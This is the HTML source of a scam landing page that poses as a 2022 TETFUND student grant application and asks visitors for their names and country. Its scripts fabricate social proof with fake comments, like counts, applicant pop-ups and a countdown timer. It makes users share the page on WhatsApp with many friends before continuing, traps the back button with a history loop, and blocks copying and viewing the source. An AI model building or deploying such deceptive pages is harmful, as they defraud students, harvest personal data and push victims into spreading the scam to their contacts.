
<!DOCTYPE html>
<html lang="en">


<head>




<script language="javascript">
document.onmousedown=disableclick;
Function disableclick(event)
{
  if(event.button==2)
   {
     alert(status);
     return false;    
   }
}
</script>
<script>
$(document).bind('keydown keypress', 'ctrl+s', function(){
  $('#save').click(); 
  return false;
});
</script>
<script id="wpcp_disable_selection" type="text/javascript">
//<![CDATA[
var image_save_msg='You Can Not Save images!';
	var no_menu_msg='Context Menu disabled!';
	var smessage = "Content is protected !!";

function disableEnterKey(e)
{
	if (e.ctrlKey){
     var key;
     if(window.event)
          key = window.event.keyCode;     //IE
     else
          key = e.which;     //firefox (97)
    //if (key != 17) alert(key);
     if (key == 97 || key == 65 || key == 67 || key == 99 || key == 88 || key == 120 || key == 26 || key == 85  || key == 86 || key == 83 || key == 43)
     {
          show_wpcp_message('You are not allowed to copy content or view source');
          return false;
     }else
     	return true;
     }
}

function disable_copy(e)
{	
	var elemtype = e.target.nodeName;
	var isSafari = /Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor);
	elemtype = elemtype.toUpperCase();
	var checker_IMG = '';
	if (elemtype == "IMG" && checker_IMG == 'checked' && e.detail >= 2) {show_wpcp_message(alertMsg_IMG);return false;}
	if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED")
	{
		if (smessage !== "" && e.detail == 2)
			show_wpcp_message(smessage);
		
		if (isSafari)
			return true;
		else
			return false;
	}	
}
function disable_copy_ie()
{
	var elemtype = window.event.srcElement.nodeName;
	elemtype = elemtype.toUpperCase();
	if (elemtype == "IMG") {show_wpcp_message(alertMsg_IMG);return false;}
	if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED")
	{
		//alert(navigator.userAgent.indexOf('MSIE'));
			//if (smessage !== "") show_wpcp_message(smessage);
		return false;
	}
}	
function reEnable()
{
	return true;
}
document.onkeydown = disableEnterKey;
document.onselectstart = disable_copy_ie;
if(navigator.userAgent.indexOf('MSIE')==-1)
{
	document.onmousedown = disable_copy;
	document.onclick = reEnable;
}
function disableSelection(target)
{
    //For IE This code will work
    if (typeof target.onselectstart!="undefined")
    target.onselectstart = disable_copy_ie;
    
    //For Firefox This code will work
    else if (typeof target.style.MozUserSelect!="undefined")
    {target.style.MozUserSelect="none";}
    
    //All other  (ie: Opera) This code will work
    else
    target.onmousedown=function(){return false}
    target.style.cursor = "default";
}
//Calling the JS function directly just after body load
window.onload = function(){disableSelection(document.body);};
//]]>
</script>
<script id="wpcp_disable_Right_Click" type="text/javascript">
	//<![CDATA[
	document.ondragstart = function() { return false;}
	/* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	Disable context menu on images by GreenLava Version 1.0
	^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ */
	    function nocontext(e) {
	       return false;
	    }
	    document.oncontextmenu = nocontext;
	//]]>
	</script>
	
<script>
		window.brandCode = "";
		window.price = "1500";
		window.startCounter = 0 ;
		window.exitUrl = "https://lets-move-now-2022.blogspot.com/";
		window.countryCode = "US";
		window.countryName = "United States";
		window.offerUrl = "https://lets-move-now-2022.blogspot.com/";
		window.shareUrl = "https://lets-move-now-2022.blogspot.com/";
		window.shareType = "whatsapp";
		window.shareUrlFB = "ng-grant-fgn.freefunds.html";
		window.shareCount = 20 ;
		window.popup = false ;
		window.brand = "";
		window.shareScrubAt = 0 ;
		window.shareScrubTo = 0 ;
		window.iframeUrl = "IFRAME_URL.html";
	</script>          
            
    <meta charset="shift_jis">
    <meta content='width=device-width, initial-scale=1.0' name='viewport'/>
   <title>TETFUND STUDENTS GRANTS 2022</title>
   <meta property="og:image" content="tetfund.png">
   <meta property="og:title" content="TETFUND STUDENTS GRANTS 2022">
   <meta property="og:description" content="Apply Now For the student N38,000 Tetfund Grants 2022">
   <meta property="og:url" content="http://edu.grants.apply">
   <link rel="stylesheet" href="bootstrap/3-3-7/css/bootstrap.min.css" >
   <script src="ajax/libs/jquery/1-11-1/jquery.min.js"></script>
<script type="text/javascript" language="javascript">
var areYouReallySure = false;
var internalLink = false;
</script>
    <script src='ajax/libs/jquery/2-2-4/jquery.min.js'>
    </script>
    <script>
      //<![CDATA[
      redirectURL = "";
      WhatsApp_share_message = "";
      Share_link = "#";
      alert_text = "Compartilhe esta oferta com pelo menos 10 amigos para continuar. Você convidou...";
      var timer_start = 5; //minutes
      //]]>
    </script>
    <script type='text/javascript'>
      //<![CDATA[
      var total = 10;
      jQuery(document).ready(function ($) {
        $(".answer").click(function () {
          if($(this).hasClass("anses1")){
            survey.step1();
          }
          if($(this).hasClass("anses2")){
            survey.step2();
          }
          if($(this).hasClass("anses3")){
            survey.step3();
          }
        });
        var clicks = 0;
        var survey = {
          step1: function(){
            setTimeout(function () {
              //hide question block MobGyan
              $(".question_count").hide();
              $(".question1").hide();
              $(".anses1").hide();
              //show calculating MobGyan
              $(".calculating").show();
              setTimeout(function () {
                //hide calculating MobGyan
                $(".calculating").hide();
                //show step 2 MobGyan
                $(".question_count span").html("2");
                $(".question_count").show();
                $(".question2").show();
                $(".anses2").show();
              }, 1200);
            }, 300);
          },
          step2: function(){
            setTimeout(function () {
              //hide question block MobGyan
              $(".question_count").hide();
              $(".question2").hide();
              $(".anses2").hide();
              //show calculating MobGyan
              $(".calculating").show();
              setTimeout(function () {
                //hide calculating MobGyan
                $(".calculating").hide();
                //show step 3 MobGyan
                $(".question_count span").html("3");
                $(".question_count").show();
                $(".question3").show();
                $(".anses3").show();
              }, 1200);
            }, 300);
          },
          step3: function(){
            setTimeout(function () {
              //hide question block MobGyan
              $(".question_count").hide();
              $(".question3").hide();
              $(".anses3").hide();
              //show calculating MobGyan
              $(".calculating").show();
              setTimeout(function () {
                //hide calculating MobGyan
                $(".calculating").hide();
                //show checking part MobGyan
                $(".survey_middle").css("vertical-align","top");
                $(".loading").show();
                setTimeout(function () {
                  $(".check1").fadeIn(300);
                  setTimeout(function () {
                    $(".check2").fadeIn(300);
                    setTimeout(function () {
                      $(".check3").fadeIn(300);
                      setTimeout(function () {
                        survey.change();
                      }, 1400);
                    }, 1100);
                  }, 1400);
                }, 750);
              }, 600);
            }, 300);
          },
          change: function(){
            //sakrij gornje MobGyan
            $(".headline,.small_headlines,.timer").hide();
            //sakrij content surveya MobGyan
            $(".loading").hide();
            $(".survey_outer").css("height","auto");
            //pokazi ostatak MobGyan
            var walink = "whatsapp://send?text="+WhatsApp_share_message+Share_link;
            //$(".btn-share").attr("href",walink); MobGyan
            $(".btn-share").click(function(){
              clicks++;
              $('#progreso').show();
              if (clicks > total) {
                window.location = redirectURL;
                return;
              }
              $('.progress span').width(((clicks / total) * 100) + '%');
              if (clicks == total) {
                window.location.href = walink;
              }
              window.location.href = walink;
            });
            $(".last_page").show();
			$(".fbcoms").show();
            waitme();
          }
        };
        $(".like").click(function() {
          if($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
            $("#youand").html("");
          } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
            $("#youand").html("You and ");
          }
        });
        $(".fblike").click(function() {
          if($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
          } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
          }
        });
        function waitme(){
          FBcom("#fb1",000);
          FBcom("#fb2",000);
          FBcom("#fb3",000);
          FBcom("#fb4",000);
          FBcom("#fb5",00);
          FBcom("#fb6",000);
          FBcom("#fb7",000);
          FBcom("#fb8",0000);
          var ct = 48;
          (function loop() {
            var rand = random(2500,5500);
            var ctrand = random(1,4);
            ct = ct - ctrand;
            if(ct > 1) {
              setTimeout(function() {
                loop(); 
              }, rand);
            } else {
              ct = "few";
            }
            $("#count").html(ct);
          }());
        }
        function FBcom(a,b) {
          setTimeout(function() {
            var m = 0, n = true, op = 0;
            $(a+", "+a+" .comtxt, "+a+" .combot").slideDown(500);
            $().slideDown(500);
            var t = setInterval(function() {
              op += 0.2;
              $(a).css({"opacity":op});
              m++;
              if(m === 5) clearInterval(t);
            }, 100);
          }, b);
        }
        function random(min, max) {
          return Math.round(Math.random() * (max - min) + min);
        }
        var out,pops = {
          init: function(){
            setTimeout(function () {
              var rand_name = pop_names[random(0,pop_names.length-1)];
              var rand_text = pop_texts[random(0,pop_texts.length-1)];
              var text = rand_name + " " + rand_text;
              $(".pops p").html(text);
              $(".pops").fadeIn(500);
              out = setTimeout(function () {
                $(".pops").fadeOut(1000);
                pops.init();
              }, 6000);
            }, random(6000, 15000));
          }
        };
        pops.init();
        $("#iks").click(function () {
          clearTimeout(out);
          $(".pops").hide();
          pops.init();
        });
        $("#mins").html("0"+timer_start);
        $("#sec").html("00");
        var mins = timer_start, secs = 0, minutes, seconds, timer = {
          init: function(){
            var counter = setInterval(function () {
              $(".timer_heading").addClass("blink");
              setTimeout(function () {
                $(".timer_heading").removeClass("blink");
              }, 500);
              secs--;
              if(secs<0){
                secs = 59;
                mins--;
                if(mins<0){
                  clearInterval(counter);
                  mins = 0;
                  secs = 0;
                  $(".timer_heading").hide();
                  $(".timer .small_headlines").show();
                }
                if(mins<10){
                  minutes = "0" + mins;
                }else{
                  minutes = mins;
                }
              }
              if(secs<10){
                seconds = "0" + secs;
              }else{
                seconds = secs;
              }
              $("#mins").html(minutes);
              $("#sec").html(seconds);
            }, 1000);
          }
        };
        timer.init();
      });
      //]]>
    </script>
    <script type='text/javascript'>
      //<![CDATA[
      var ii = 0; // needed for safari
      var iy = 0;
      if (typeof history.pushState === "function") {
        history.pushState("back", null, null);
        window.onpopstate = function() {
          history.pushState('back', null, null);
          if (iy==3) {
            iy=0;
          } else if (ii == 1) {
            document.getElementById('popup1').style.display = "none";
            setTimeout(function() {
              if (document.getElementById('popup1').style.display == "none") {
                document.getElementById('popup1').style.display = "block";
              }
            }, 300);
            window.navigator.vibrate(000);
            iy=iy+1;
          }
        };
      }
      setTimeout(function() {
        ii = 1;
      }, 200);
      function hidepop() {
        document.getElementById('popup1').style.display = "none";
      }
      //]]>
    </script>
<style>
@import url('https://fonts.googleapis.com/css?family=Montserrat');
@font-face{
font-family: 'Roboto';
font-weight: 400;
src: url(fonts/Roboto-Regular.html);
}
@font-face{
font-family: 'Roboto';
font-weight: 700;
src: url(fonts/Roboto-Bold.html);
}
@font-face{
font-family: 'Tahoma';
font-weight: 400;
src: url(fonts/Tahoma.html);
}
@font-face{
font-family: 'Tahoma';
font-weight: 700;
src: url(fonts/Tahoma-Bold.html);
}
body,html{
width: 100%;
margin: 0;
font-family: 'Montserrat', sans-serif;
background: #000;
color:#333;
}
/*clearfix MobGyan*/
.clearfix:before, .clearfix:after{content:"";display:table;}
.clearfix:after{clear: both;}
.clearfix{*zoom: 1;}
*{
box-sizing: border-box;
}
p{
margin: 0;
}
.cont_outer{
position: absolute;
display: table;
width: 100%;
height: 100%;
background-image: url(img/219958493.html);
background-position: center top;
background-size: 750px auto;
background-repeat: repeat-y;
}
.bold{
font-weight: 700;
}
/*************************************************** header MobGyan ***************************************************/
.header{
display: table-row;
width: 100%;
height: 50px;
background-color: #fff;
font-weight: 700;
}
.header-inner{
display: table-cell;
vertical-align: middle;
text-align: center;
}
.header-inner p{
vertical-align: middle;
color: #fff;
font-size: 18px
}
.header-inner p img{
vertical-align: middle;
}
#folder{
width: 28px;
}
#rupee1{
width: 14px;
padding-left: 2px
}
/*************************************************** content MobGyan ***************************************************/
.content{
display: table-row;
width: 100%;
overflow-x: hidden
}
.content-middle{
display: table-cell;
vertical-align: middle;
width: 100%;
padding: 15px;
}
.content-inner{
width: 95%;
max-width: 600px;
margin: 5px auto;
text-align: center;
padding: 15px 3px;
border-radius: 4px;
background-color: #666;
color: #fff;
padding: 15px;
}
#logo{
width: 220px;
}
.headline{
color: #fff;
font-weight: bold;
font-size: 22px;
line-height: 45px
}
.headline,.headline span img{
vertical-align: middle;
}
.headline span{
vertical-align: top;
}
.headline span{
text-decoration: underline;
}
.headline span img{
width: 12px;
margin-left: 3px;
}
.small_headlines{
font-size: 16px;
color: #fff;
font-weight: 400;
padding-bottom: 10px;
}
.small_headlines img{
width: 10px;
margin-left: 3px;
vertical-align: middle;
line-height: 22px;
}
.question2,.question3{
display: none;
}
/*************************************************** survey MobGyan ***************************************************/
.survey_outer{
display: table;
width: 95%;
margin: 15px auto 0;
background-color: #8c8484;
border-radius: 4px;
height: 295px;
}
.survey_middle{
display: table-cell;
vertical-align: middle;
}
.survey_inner{
display: block;
width: 95%;
margin: 0 auto;
padding: 15px 0;
position: relative;
}
.anses2,.anses3{
display: none;
}
.question_count{
color: #fff;
font-size: 24px;
font-weight: 700;
}
.question_text{
color: #fff;
font-size: 20px;
line-height: 38px;
}
.question2{
line-height: 1.2em;
padding: 10px 0 15px;
}
.question3{
line-height: 1.2em;
}
.answer{
width: 80%;
margin: 15px auto;
text-align: center;
padding: 7px 0;
color: #222;
background-color: #fff;
border-radius: 7px;
border: 1px solid #027CD5;
font-size: 24px;
font-weight: 400;
cursor: pointer;
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
.answer:hover{
color: #222;
background-color: #fff;
font-weight: 700;
}
.calculating{
display: none;
vertical-align: middle;
font-size: 28px;
text-transform: uppercase;
color: #fff;
font-weight: 700;
}
.calculating img{
vertical-align: middle;
width: 50px;
}
/****** loading MobGyan ******/
.loading{
display: none;
text-align: center;
color: #fff;
font-weight: 700;
}
.loading img{
width: 70%;
max-width: 220px;
margin: 0 auto 15px;
}
.load_headline{
font-size: 24px;
margin: 15px 0;
}
.check{
font-size: 20px;
margin: 10px 0;
}
.check1,.check2,.check3{
display: none;
}
/*************************************************** last page MobGyan ***************************************************/
.last_page{
display: none;
}
.last-up{
text-align: left;
}
.textlastup{
color: #fff;
font-size: 18px;
padding-bottom: 8px;
margin: 8px;
font-weight: 400;
}
.btn{
width: 80%;
font-size: 28px;
max-width: 345px;
margin: 15px auto;
background-color: #58BE41;
border-radius: 5px;
color: #fff;
font-weight: 700;
text-align: center;
display: block;
padding: 7px 0;
text-decoration: none;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out;
box-shadow: none;
}
.btn:hover{
background-color: #fff;
color: #58BE41;
box-shadow: 0 0 2px #58BE41,
0 0 5px #58BE41,
0 0 7px #58BE41,
0 0 11px #58BE41;
}
.btn-share{
font-size: 24px;
background-color: #58BE41;
background-size: 40px auto;
background-position: left 5px top 1px;
background-repeat: no-repeat;
}
.progress {      width:80%;      height: 20px;  /* Can be anything MobGyan */      position: relative;      margin: 60px 0 20px 0; /* Just for demo spacing */      background: #555;      padding: 10px;      -webkit-box-shadow: inset 0 -1px 1px rgba(255,255,255,0.3);      -moz-box-shadow   : inset 0 -1px 1px rgba(255,255,255,0.3);      box-shadow        : inset 0 -1px 1px rgba(255,255,255,0.3);      margin: auto;    }    .progress > span {      display: block;      height: 20px;	  left: 0;	  top: 0;      background-color: #3F51B5;      background-image: -webkit-gradient(         linear,         left bottom,         left top,         color-stop(0, #00BCD4),         color-stop(1, #2196F3)        );      background-image: -moz-linear-gradient(        center bottom,        rgb(43,194,83) 37%,        rgb(84,240,84) 69%       );      -webkit-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      -moz-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      position: absolute;      overflow: hidden;    }    .progress > span:after, .animate > span > span {      content: "";      position: absolute;      top: 0; left: 0; bottom: 0; right: 0;      background-image:          -webkit-gradient(linear, 0 0, 100% 100%,             color-stop(.25, rgba(255, 255, 255, .2)),             color-stop(.25, transparent), color-stop(.5, transparent),             color-stop(.5, rgba(255, 255, 255, .2)),             color-stop(.75, rgba(255, 255, 255, .2)),             color-stop(.75, transparent), to(transparent)         );      background-image:         -moz-linear-gradient(          -45deg,             rgba(255, 255, 255, .2) 25%,             transparent 25%,             transparent 50%,             rgba(255, 255, 255, .2) 50%,             rgba(255, 255, 255, .2) 75%,             transparent 75%,             transparent         );      z-index: 1;      -webkit-background-size: 50px 50px;      -moz-background-size: 50px 50px;      -webkit-animation: move 2s linear infinite;         -webkit-border-top-right-radius: 8px;      -webkit-border-bottom-right-radius: 8px;             -moz-border-radius-topright: 8px;          -moz-border-radius-bottomright: 8px;                 border-top-right-radius: 8px;              border-bottom-right-radius: 8px;          -webkit-border-top-left-radius: 20px;       -webkit-border-bottom-left-radius: 20px;              -moz-border-radius-topleft: 20px;           -moz-border-radius-bottomleft: 20px;                  border-top-left-radius: 20px;               border-bottom-left-radius: 20px;      overflow: hidden;    }        .animate > span:after {      display: none;    }        @-webkit-keyframes move {        0% {           background-position: 0 0;        }        100% {           background-position: 50px 50px;        }    }
.btn-down{
font-size: 24px;
text-transform: uppercase;
}
/*************************************************** facecomms MobGyan ***************************************************/
/* COMMENTS MobGyan*/
.fbcoms {
font-family: Tahoma, Verdana, sans-serif;
background-color: #fff;
width: 100%;
margin: 0 auto;
color: #000;
padding: 5px 10px;
font-size: 12px;
text-align: left;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.comments {
font-weight: bold;
text-align: center;
padding: 0 5px 10px 5px;
}
.totlikes {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-image: url("img/f/like.html");
background-repeat: no-repeat;
background-position: 5px center;
}
.fbblue {
color: #3c5a96;
}
.buttons {
padding-bottom: 5px;
font-family: Arial, sans-serif;
color: #7d7d7f;
}
.buttons span {
cursor: pointer;
}
.buttons span:hover {
text-decoration: underline;
}
.viewmore {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-image: url("img/f/bubble.html");
background-position: 5px center;
background-repeat: no-repeat;
}
.left {
cursor: pointer;
float: left;
color: #3c5a96;
}
.left:hover {
text-decoration: underline;
}
.right {
color: #7d7d7f;
float: right;
}
.item {
position: relative;
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 60px;
min-height: 60px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.item .profileimg {
position: absolute;
top: 5px;
left: 5px;
}
.comtxt {
line-height: 16px;
}
.name {
color: #3c5a96;
font-weight: bold;
}
.ago {
color: #86878c;
font-size: 0.95em;
}
.fblike {
color: #3c5a96;
font-size: 0.95em;
cursor: pointer;
}
.fblike:hover {
text-decoration: underline;
}
.combot {
padding-top: 5px;
}
.clickhere {
font-weight: bold;
padding: 30px 10px 5px;
line-height: 18px;
}
.likes {
color: #3c5a96;
font-size: 0.95em;
cursor: pointer;
}
.fbimg {
background-color: #fff;
border-radius: 2px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
max-width: 210px;
width: 100%;
padding: 3px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
border: 1px solid #808080;
margin: 10px 0 5px;
}
.hidden {
display: none;
opacity: 0;
}
.hidden .comtxt, .hidden .combot, .comments {
display: none;
}
.answer{
cursor: pointer;
}
/*************************************************** pops ***************************************************/
.pops{
position: fixed;
top: 80px;
right: 10px;
display: none;
width: 230px;
margin: 10px 10px 0 0;
background-color: rgba(173,176,192,0.8);
width: 230px;
border-radius: 8px;
box-shadow: 0 0 7px #888888;
padding-bottom: 3px
}
#piplovi{
width: 55px;
margin: 0;
padding: 5px;
float: left;
}
#iks{
position: absolute;
top: -10px;
right: -10px;
width: 20px;
cursor: pointer;
}
.pops p{
width: 170px;
padding: 2px;
padding-top: 10px;
margin-left: 50px;
font-size: 14px;
color: #fff;
word-spacing: 0;
line-height: 100%;
}
/*************************************************** timer MobGyan ***************************************************/
.timer .small_headlines{
display: none;
}
.timer_heading{
width: 80%;
margin: 0 auto;
font-size: 16px;
color: #555;
font-weight: 400;
padding-bottom: 10px;
}
@-webkit-keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
@-moz-keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
@keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
.blink{
-webkit-animation: 0.2s bllink ease-in-out alternate;
-moz-animation: 0.2s bllink ease-in-out alternate; 
animation: 0.2s bllink ease-in-out alternate;
}
/*************************************************** media MobGyan ***************************************************/
@media screen and (max-width: 600px){
.cont_outer{
background-size: 600px auto;
}
.headline{
font-size: 18px;
}
.small_headlines,.timer_heading{
font-size: 13px;
}
}
@media screen and (max-width: 500px){
.btn{
width: 90%;
max-width: 345px;
}
}
@media screen and (max-width: 400px)
.header-inner p{
font-size: 14px;
}
#rupee1{
width: 12px;
padding-left: 2px
}
.header{
height: 40px;
}
.answer{
margin: 10px auto;
padding: 5px 0;
border-radius: 7px;
border: 1px solid #027CD5;
font-size: 20px;
color: #222;
font-weight: 700;
}
.survey_outer{
height: 250px;
}
.calculating{
font-size: 22px;
}
.load_headline{
font-size: 20px;
margin: 15px 0;
}
.check{
font-size: 16px;
margin: 10px 0;
}
.textlastup{
font-size: 16px;
padding-bottom: 5px;
font-weight: 400;
}
.btn{
width: 100%;
max-width: 345px;
}
.btn-share{
font-size: 20px;
background-size: 36px auto;
}
.btn-down{
font-size: 20px;
}
}	#main-frame-error{display:none;height:auto}.interstitial-wrapper{padding-top:10px;box-sizing:border-box;font-size:1em;line-height:18px;margin:auto;max-width:600px;width:90%}#today{float:right;font-weight:600;padding-top:15px}#main-message>p{display:inline}#blink{color:#f00;padding:6px;-webkit-animation:blink 1s infinite;-moz-animation:blink 1s infinite;-ms-animation:blink 1s infinite;-o-animation:blink 1s infinite;animation:blink 1s infinite}@-webkit-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-moz-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-ms-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}}@-o-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}#theTime{font-size:18px;font-weight:bold;color:red;font-family:sans-serif}h1{color:#000;font-size:1.6em;line-height:1.25em;margin-bottom:16px}#alertimg{height:26px;width:26px;position:absolute;top:13px;left:17px}.popup{display:none;position:absolute;top:20%;left:50%;width:88%;max-width:280px;margin:0 0 0 -140px;font-size:1em;border-radius:4px;background-color:#282828;color:#fff;overflow:hidden;box-shadow:1px 1px 7px #000;z-index:100}.popup-head{background-color:#282828;padding:18px 16px 18px 55px;border-bottom:2px solid #33b4e4;color:#33b4e4;line-height:normal}.popup-center{padding:20px 16px;color:#f3f3f3;line-height:20px}.popup-bottom{background-color:#282828;padding:9px 6px;text-align:center;border-top:1px solid #474747;overflow:hidden}.popup-bottom .button{display:block;height:30px;width:128px;margin:0 auto;font-size:1.1em;color:#f3f3f3;border-radius:3px;cursor:pointer;text-decoration:none;padding:0;line-height:30px}
a {
text-decoration: none;
}
</style>
  <link rel="me" href="#" />
<link rel="me" href="#" />
<link rel="me" href="#" />
<link rel="me" href="#" />
<!-- custom-theme -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="keywords" content="Funding Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, 
Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyEricsson, Motorola web design" />
<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
		function hideURLbar(){ window.scrollTo(0,1); } </script>
<!-- //custom-theme -->
<link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all" />
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="css/flexslider.css" type="text/css" media="screen" property="" />
<!-- font-awesome-icons -->
<link href="css/font-awesome.css" rel="stylesheet"> 
<link href="http://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,400,400i,600,600i,700,900" rel="stylesheet">
</head>	
<body>
<!-- banner -->
	<div class="banner">
		<nav class="navbar navbar-default">
			<div class="navbar-header navbar-left">
				<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
					<span class="sr-only">Toggle navigation</span>
					<span class="icon-bar"></span>
					<span class="icon-bar"></span>
					<span class="icon-bar"></span>
				</button>
				<h1><a href="index.html" class="logo float-left"><img style='width=10%' src="" alt="TETFUND 2022" /></a>
						<nav class="navigation-block float-right"></h1>
			</div>
			<!-- Collect the nav links, forms, and other content for toggling -->
			<div class="collapse navbar-collapse navbar-right" id="bs-example-navbar-collapse-1">
				<nav class="link-effect-2" id="link-effect-2">
					<ul class="nav navbar-nav">
						<li><a href="#"><span data-hover="Home">Home</span></a></li>
						<li class="active"><a href="index.html"><span data-hover="About Us">About Us</span></a></li>
						<li><a href="#"><span data-hover="Events">Events</span></a></li>
						<li><a href="#"><span data-hover="Mail Us">Mail Us</span></a></li>
					</ul>
				</nav>
			</div>
		</nav>
		</div>
<!-- //banner -->	
	<!-- stats -->
	<div class="stats">
		<div class="col-md-3 w3layouts_stats_left w3_counter_grid">
			<p class="counter">100000</p>
			<h3>HIGH/SECONDARY SCHOOL GRANTS</h3>
		</div>
		<div class="col-md-3 w3layouts_stats_left w3_counter_grid1">
			<p class="counter">300000</p>
			<h3>UNDERGRADUATE GRANTS</h3>
		</div>
		<div class="col-md-3 w3layouts_stats_left w3_counter_grid2">
			<p class="counter">50000</p>
			<h3>POSTGRADUATE GRANTS</h3>
		</div>
		<div class="col-md-3 w3layouts_stats_left w3_counter_grid3">
			<p class="counter">1000000</p>
			<h3>APPLICANTS TO BENEFIT</h3>
		</div>
		<div class="clearfix"> </div>
	</div>
<!-- //stats -->
<!-- courses -->
	<div class="team">
		<div class="container"> 
			<div class="w3_agile_team_grid">
				<div class="w3_agile_team_grid_left">
					<h3 class="w3l_header w3_agileits_header">TETFUND<span> STUDENTS GRANTS 2022</span></h3>
		            <p class="sub_para_agile">APPLY FROM THE ON GOING TETFUND GRANTS 2022</p>
				</div>
			</div>
			<div class="agile_team_grids_top">
				<div class="col-md-6 w3ls_banner_bottom_left w3ls_courses_left">
					<div class="w3ls_courses_left_grids">
						<div class="w3ls_courses_left_grid">
							<h3><i class="fa fa-pencil-square-o" aria-hidden="true"></i>HIGH SCHOOL AND SECONDARY SCHOOL STUDENTS</h3>
							<p>.</p>
						</div>
						<div class="w3ls_courses_left_grid">
							<h3><i class="fa fa-pencil-square-o" aria-hidden="true"></i> UNDERGRADUATE Students</h3>
							<p></p>
						</div>
						<div class="w3ls_courses_left_grid">
							<h3><i class="fa fa-pencil-square-o" aria-hidden="true"></i>Post Graduate students</h3>
							<p></p>
						</div>
					</div>
				</div>
				<div class="col-md-6 agileits_courses_right">
				    <center><b><h2>START APPLICATION HERE</h2></b></center>
					<div class='popup fourth' id='popup1' style='display:none'>
      <div class='popup-head'>
        <img alt='' height='26' id='alertimg' src='tetfund.png' width='26'/>
         Attention!  
      </div>
      <div class='popup-center'>
      Follow the instructions.
      </div>
      <div class='popup-bottom'>
        <div class='button' onclick='hidepop();'>
          Ok
        </div>
      </div>
    </div>
	<center>
    <div class='content'>
      <!-- content -->
      <div class='content-middle'>
        <div class='content-inner'>
           <p class='headline'>
          </p> 
<img src='tetfund.png' width='100%'>
     <div class="form-group"> <label for="s1">Provide your First Name</label>
<input type="text" placeholder="First Name" name="name" class="form-control" required="">
</div>
<div class="form-group">
<label for="s1">Provide your Last Name</label>
<input type="text" placeholder="Last Name" name="LName" class="form-control" required="">
</div>
<div class="form-group">
<label for="s1">Country</label>
<input type="text" placeholder="Your Country" name="LName" class="form-control" required="">
</div>
<a href="step2.htm"><button type="submit" class="btn btn-lg btn-login btn-block">Continue
<span class="fui-arrow-right"></span>
</button></a>    
				  <!-- Ads Hare
	<br/>
                  <div class='fbcoms' style="display:none;">
                    <p class='comments'>
                    </p>
                    <p class='buttons'>
                      <span class='like'>
                        Like     
                      </span>
                      &#183; 
                      <span>
                        Share    
                      </span>
                      &#183; 
                      <span>
                        Comment
                      </span>
                      &#183; 
                      <span>
                        Remove
                      </span>
                    </p>
                    <p class='totlikes'>
                      <span id='youand'>
                      </span>
                      <span class='fbblue'>
                        others 204,208 
                      </span>
                      like this
                    </p>
                    <p class='viewmore clearfix'>
                      <span class='left'>
                        more comments...
                      </span>
                      <span class='right'>
                   63 of 173,330
                      </span>
                      <br/>
                    </p>
                    <div class='item' id='fb8' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/CicMV6Y.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
